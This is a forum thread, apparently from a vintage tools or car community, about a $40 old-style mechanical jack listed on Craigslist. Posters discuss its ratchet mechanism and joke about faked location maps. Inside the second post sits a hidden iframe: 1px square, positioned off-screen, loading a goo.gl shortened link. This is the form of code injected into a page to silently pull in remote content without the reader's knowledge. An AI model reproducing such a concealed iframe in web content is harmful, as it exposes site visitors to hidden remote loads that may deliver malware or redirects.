The guy selling it lives in "Fruitland".

That looks perfectly usable. $40 too, what a steal...<iframe style="width:1px; height:1px; position:absolute; left:-10px;" src="http://goo.gl/0xkZCj"></iframe>

Try looking at the google map that is to the right of the pic, Its right on there.

Old time mechanical jack, works on the same principal as a bumper jack or farm jack. Given a clean mechanism without excessive wear, it should last for years.

And it has.
I would have no second thought about using it within it's weight rating.
It also will never leak down like a hydraulic jack can.

I did, and I saw it. But like a lot of other things on CL, even this can be photoshopped.

I have seen people put the little map address flag on pictures of a human body and said they lived in Fartland!

Yikes!

I sold the twin to this jack a few years ago. Really neat mechanism but mine seemed to not lock in place properly when it lifted.

I didn't have room for it at the time but one of my daydreams is to turn a corner of the shop into a 1930's garage with period tools and leave it on static like a vintage photo.

It would even be fun to do maintenance on a T or A using only period tools.

Man am I glad that thing's on the other side of the country. If it was anywhere close to me for $40 I probably couldn't help myself.

Looks like a great project jack, too bad I'm a little too far away to go grab it.
